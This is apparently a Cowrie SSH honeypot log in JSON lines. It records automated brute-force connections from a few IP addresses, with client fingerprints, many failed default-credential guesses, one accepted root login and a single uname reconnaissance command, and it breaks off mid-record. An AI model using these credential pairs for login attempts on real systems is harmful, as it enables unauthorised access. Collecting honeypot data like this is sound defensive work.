{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:39:04.857055Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.857745Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.909304Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.910841Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:05.583369Z","src_ip":"83.168.105.65","session":"38a22721e84a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44982,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3daf69c2383","protocol":"ssh","message":"New connection: 212.227.125.160:44982 (1.2.3.4:22) [session: a3daf69c2383]","sensor":"my-vps","timestamp":"2025-08-26T11:39:09.890319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:09.891491Z","src_ip":"212.227.125.160","session":"a3daf69c2383"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:09.947120Z","src_ip":"212.227.125.160","session":"a3daf69c2383"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:10.145010Z","src_ip":"212.227.125.160","session":"a3daf69c2383"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:11.303042Z","src_ip":"212.227.125.160","session":"a3daf69c2383"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":42060,"dst_ip":"1.2.3.4","dst_port":22,"session":"82fd3b728969","protocol":"ssh","message":"New connection: 45.88.8.186:42060 (1.2.3.4:22) [session: 82fd3b728969]","sensor":"my-vps","timestamp":"2025-08-26T11:39:15.413868Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45748,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b19a9d3008","protocol":"ssh","message":"New connection: 212.227.125.160:45748 (1.2.3.4:22) [session: c1b19a9d3008]","sensor":"my-vps","timestamp":"2025-08-26T11:39:15.795497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:15.796163Z","src_ip":"212.227.125.160","session":"c1b19a9d3008"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:15.857929Z","src_ip":"212.227.125.160","session":"c1b19a9d3008"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:16.046416Z","src_ip":"45.88.8.186","session":"82fd3b728969"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:16.047105Z","src_ip":"45.88.8.186","session":"82fd3b728969"}
{"eventid":"cowrie.login.failed","username":"odoo16","password":"odoo16","message":"login attempt [odoo16/odoo16] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:16.049264Z","src_ip":"212.227.125.160","session":"c1b19a9d3008"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:17.131070Z","src_ip":"212.227.125.160","session":"c1b19a9d3008"}
{"eventid":"cowrie.login.success","username":"root","password":"babygirl","message":"login attempt [root/babygirl] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:39:18.972963Z","src_ip":"45.88.8.186","session":"82fd3b728969"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:19.903727Z","src_ip":"45.88.8.186","session":"82fd3b728969"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":45742,"dst_ip":"1.2.3.4","dst_port":22,"session":"11b589791238","protocol":"ssh","message":"New connection: 83.168.105.65:45742 (1.2.3.4:22) [session: 11b589791238]","sensor":"my-vps","timestamp":"2025-08-26T11:39:19.958104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:19.958974Z","src_ip":"83.168.105.65","session":"11b589791238"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:19.994950Z","src_ip":"83.168.105.65","session":"11b589791238"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:20.105475Z","src_ip":"83.168.105.65","session":"11b589791238"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:21.143550Z","src_ip":"83.168.105.65","session":"11b589791238"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46514,"dst_ip":"1.2.3.4","dst_port":22,"session":"724335922ebe","protocol":"ssh","message":"New connection: 212.227.125.160:46514 (1.2.3.4:22) [session: 724335922ebe]","sensor":"my-vps","timestamp":"2025-08-26T11:39:22.304332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:22.339120Z","src_ip":"212.227.125.160","session":"724335922ebe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:22.385275Z","src_ip":"212.227.125.160","session":"724335922ebe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:22.602319Z","src_ip":"212.227.125.160","session":"724335922ebe"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:23.654857Z","src_ip":"212.227.125.160","session":"724335922ebe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47284,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35f0d3a9c35","protocol":"ssh","message":"New connection: 212.227.125.160:47284 (1.2.3.4:22) [session: e35f0d3a9c35]","sensor":"my-vps","timestamp":"2025-08-26T11:39:27.655851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:27.656873Z","src_ip":"212.227.125.160","session":"e35f0d3a9c35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:27.707156Z","src_ip":"212.227.125.160","session":"e35f0d3a9c35"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:27.857503Z","src_ip":"212.227.125.160","session":"e35f0d3a9c35"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:29.202239Z","src_ip":"212.227.125.160","session":"e35f0d3a9c35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48050,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0dc9ec9690f","protocol":"ssh","message":"New connection: 212.227.125.160:48050 (1.2.3.4:22) [session: c0dc9ec9690f]","sensor":"my-vps","timestamp":"2025-08-26T11:39:33.445841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:33.447704Z","src_ip":"212.227.125.160","session":"c0dc9ec9690f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:33.503837Z","src_ip":"212.227.125.160","session":"c0dc9ec9690f"}
{"eventid":"cowrie.login.failed","username":"suporte","password":"suporte","message":"login attempt [suporte/suporte] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:33.675363Z","src_ip":"212.227.125.160","session":"c0dc9ec9690f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:34.727430Z","src_ip":"212.227.125.160","session":"c0dc9ec9690f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57860,"dst_ip":"1.2.3.4","dst_port":22,"session":"a866c7041c25","protocol":"ssh","message":"New connection: 83.168.105.65:57860 (1.2.3.4:22) [session: a866c7041c25]","sensor":"my-vps","timestamp":"2025-08-26T11:39:35.389081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:35.390054Z","src_ip":"83.168.105.65","session":"a866c7041c25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:35.427380Z","src_ip":"83.168.105.65","session":"a866c7041c25"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:35.540690Z","src_ip":"83.168.105.65","session":"a866c7041c25"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:36.580647Z","src_ip":"83.168.105.65","session":"a866c7041c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48824,"dst_ip":"1.2.3.4","dst_port":22,"session":"16f739a0df52","protocol":"ssh","message":"New connection: 212.227.125.160:48824 (1.2.3.4:22) [session: 16f739a0df52]","sensor":"my-vps","timestamp":"2025-08-26T11:39:39.740597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:39.741678Z","src_ip":"212.227.125.160","session":"16f739a0df52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:39.793908Z","src_ip":"212.227.125.160","session":"16f739a0df52"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:40.319806Z","src_ip":"212.227.125.160","session":"16f739a0df52"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:41.389278Z","src_ip":"212.227.125.160","session":"16f739a0df52"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36958,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1dbd98ab7f4","protocol":"ssh","message":"New connection: 196.251.86.249:36958 (1.2.3.4:22) [session: d1dbd98ab7f4]","sensor":"my-vps","timestamp":"2025-08-26T11:39:43.925581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:44.615908Z","src_ip":"196.251.86.249","session":"d1dbd98ab7f4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie